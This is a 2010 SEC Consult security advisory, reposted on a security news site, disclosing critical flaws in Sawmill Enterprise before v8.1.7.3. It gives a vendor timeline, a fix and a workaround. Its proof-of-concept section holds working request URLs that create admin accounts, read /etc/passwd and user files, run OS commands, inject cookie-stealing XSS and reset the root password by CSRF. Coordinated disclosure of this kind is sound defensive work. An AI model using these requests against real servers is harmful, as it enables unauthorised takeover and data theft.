首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sawmill Enterprise < v8.1.7.3 Multiple Vulnerabilities
来源:www.sec-consult.com 作者:SECConsult 发布时间:2010-10-25  

SEC Consult Security Advisory < 20101021-0 >
=======================================================================
              title: Multiple critical vulnerabilities
            product: Sawmill - Universal Log File Analysis
 vulnerable version: Sawmill Enterprise < v8.1.7.3
      fixed version: v8.1.7.3
             impact: critical
           homepage: http://www.sawmill.net
              found: 2010-07-20
                 by: J. Greil / SEC Consult / www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Sawmill is universal log analysis software that runs on every major
platform. It can process almost any type of log data. The reports that
Sawmill generates are hierarchical, attractive, and heavily
cross-linked for easy navigation. Complete documentation is built
directly into the program."

source:
http://www.sawmill.net/features.html


Vulnerability overview/description:
-----------------------------------
Sawmill suffers from multiple critical vulnerabilities which allow an
_unauthenticated_ attacker to gain administrative rights. Furthermore
it is possible to access (RW) the file system and execute arbitrary
commands on the operating system without authentication.

Attackers with valid accounts are able to reset the root password or
add/delete log profiles, view and manipulate admin settings etc.

It must be noted that further vulnerabilities are to be expected
within the software (such as buffer overflows, etc.). Due to lack of
time no further vulnerabilities could be searched.


1) Unauthenticated access to critical functions
Unauthenticated attackers are e.g. able to create new user accounts
with administrative "Manager" roles. It is possible to exploit the
built-in "salang" scripting language to read/write files on the file
system (e.g. user configuration with MD5 hashes), connect to other
internal systems or execute arbitrary operating system commands.


2) Insufficient validation of user access rights
Users with standard access rights/roles (e.g. "Statistics Visitor") are
able to access functions or methods of the Sawmill application where
they shouldn't have access to (default permissions of installation).

"Statistics visitor" users are able to access administrative functions
or admin menus in order to gain sensitive information or even manipulate
settings, create new profiles or delete profiles. The creation of new
profiles also results in a denial-of-service (temporarily until admin
deletes profiles) if more profiles are being created than the license
currently allows.

It is possible to access the Sawmill setup page in order to reset the
Sawmill root username and password with a standard user account.

A standard user is also able to gain access to more functions within
the interface (e.g. regarding profiles) just by changing local
JavaScript variables, e.g. through an intercepting proxy server.


3) XSS / CSRF
There are many parameters which are not properly sanitised and
vulnerable to XSS. Furthermore no protection against CSRF is in place
which e.g. allows remote attackers to reset the root password by
e.g. exploiting the vulnerabilities in section 1 or 2.


Proof of concept:
-----------------
1) Unauthenticated access to critical functions

* Create a user account with admin rights:
http://$host/?a=cu&u=testing&pw=testing&roles=role_1

* Read files of the file system:
http://$host/?a=ee&exp=error(read_file('/etc/passwd'))
http://$host/?a=ee&exp=error(read_file('LogAnalysisInfo/users.cfg'))

(error() call is needed to print the output within the web interface
instead of stdout)

* Write files:
E.g. use the write_file() method

* Execute OS commands:
http://$host/?a=ee&exp=exec('/bin/ls','Output',1))
(exec() only returns PID and no output. I'll leave it to the
creativity of the reader to further exploit this :))


2) Insufficient validation of user access rights

* Access to the "new profile wizard" including file browser as standard
  "Statistics viewer" user:
  This feature also allows to choose arbitrary files as log analysis
  input and to disclose its contents then (file disclosure):
 
http://$host/?dp+templates.new_profile_wizard.index

* Access the Sawmill setup page to reset Sawmill root password:
http://$host/?dp=templates.setup

* Gain sensitive information, such as config/user settings:
http://$host/?dp=templates.admin_pages.users.get_data&v.fp.is_root_admin=true&v.fp.is_unlimited_grants=true

http://$host/?dp=templates.admin_pages.root_admin.get_data
[... see file system for further pages ...]

* Manipulate/create/delete user accounts:
  POST /?dp+templates.admin_pages.users.save_data
  Host: $host

  v.fp.is_enterprise=true
  &v.fp.deleted_users=
  &v.fp.users.user_1.is_new=false
  &v.fp.users.user_1.username=xxxxx
  &v.fp.users.user_1.password=
  &v.fp.users.user_1.language=
  &v.fp.users.user_1.created_by_user=root_admin
  &v.fp.users.user_1.access.0.all_profiles=false
  &v.fp.users.user_1.access.0.created_by_user=root_admin
  &v.fp.users.user_1.access.0.profiles=testprofile
  &v.fp.users.user_1.access.0.roles.0=role_2
  &v.fp.users.user_1.auto_direct_to_reports_after_login=false
  &v.fp.users.user_1.report_filters.all_profiles.filter_expression=
  [...]

* Changing local variables:
By changing the local JS variables "isrootAdmin", "isAdd", "isDelete",
etc. from "false" to "true" an attacker is able to unlock "hidden"
features and e.g. is able to manipulate other profiles on the index page
(other profiles can be deleted!).


3) XSS (valid session necessary, payload will be auto-executed after
login)
http://$host/?dp=reports&p=testprofile&wbsi=";alert(document.cookie);//
http://$host/?dp=reports&p=testprofile&rii=";alert(123);//&wbsi=1279796468489657

Unauthenticated XSS:
http://$host/?dp=printer_friendly_report&%253cscript%253ealert%281%29%253c/script%253e=1

CSRF to reset root account to chosen password (valid standard user
session necessary):
http://$host/?dp=templates.setup&volatile.fp.setup_directive=finish&volatile.fp.license_key=&volatile.fp.username=root&volatile.fp.password=test&volatile.fp.trial_licensing_features=&volatile.fp.talkback=false&volatile.is_server_background_call=true


Vulnerable / tested versions:
-----------------------------
Sawmill Enterprise v8.1.5.1 (running on Linux)

Older versions may be vulnerable too, but have not been tested as
v8.1.5.1 is the latest version available at the time of testing
(July 2010).

During the time of fixing, v8.1.6.3 has been tested shortly and the
most critical flaws have not yet been fixed in this version.

Furthermore, some pre-release builds after v8.1.6.3 have been shortly
tested too.


Vendor contact timeline:
------------------------
2010-07-29: Contacting Sawmill via email and asking for a security
            contact (sales@ and support () sawmill co uk)
2010-07-29: Quick reply of Sawmill Sales and Support team
            Sent advisory to given contact
2010-07-29: Again quick reply of given contact with estimated fixing
            time (early September with next release 8.1.6)
2010-07-30: Confirmation of vulnerabilities from vendor            
2010-08-02: Asking for information which Sawmill versions are affected
2010-08-12: Vendor: Fixing is in progress, version info will be
            collected in an internal document
2010-09-01: Vendor: problems mostly fixed in upcoming 8.1.6 in about
            two weeks
2010-09-07: New release 8.1.6.3 available, does not fix critical
            vulnerabilities
2010-09-08: Pre-release version available, very shortly checked for fix
            of critical vulnerabilities, 8.1.7 is scheduled, XSS still
            possible
2010-09-21/24: v8.1.7 will be released soon, fixes most critical bugs.
            Short-term plan to implement URL parameter filtering
            against XSS in future versions
2010-10-01: Sending new advisory draft to sawmill for review
2010-10-07: v8.1.7 still under QA
2010-10-13: v8.1.7.3 is available: Fixes reported flaws, CSRF
            protection will come in future releases.
2010-10.21: Coordinated release date           

Special thanks to Greg!

Solution:
---------
Upgrade to the latest available version v8.1.7.3

http://www.sawmill.co.uk/downloads.html

Workaround:
-----------
Restrict access to the software as much as possible. Only allow trusted
IP addresses and users in order to minimise attack surface. No other
proper workaround is available.


Advisory URL:
-------------
https://www.sec-consult.com/advisories_e.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF J. Greil / @2010


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows Mobile 6.1 and 6.5 Dou
·Altova DatabaseSpy 2011 Projec
·Adobe Shockwave player rcsL ch
·Spider Player 2.4.5 Denial of
·LibSMI smiGetNode Buffer Overf
·GNU C library dynamic linker L
·MS10-070 ASP.NET Auto-Decrypto
·RarmaRadio v2.52 (.m3u) Denial
·Winamp 5.5.8 (in_mod plugin) S
·AnyDVD <= 6.7.1.0 Denial Of Se
·Fat Player Media Player 0.6b0
·HP Data Protector Media Operat
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved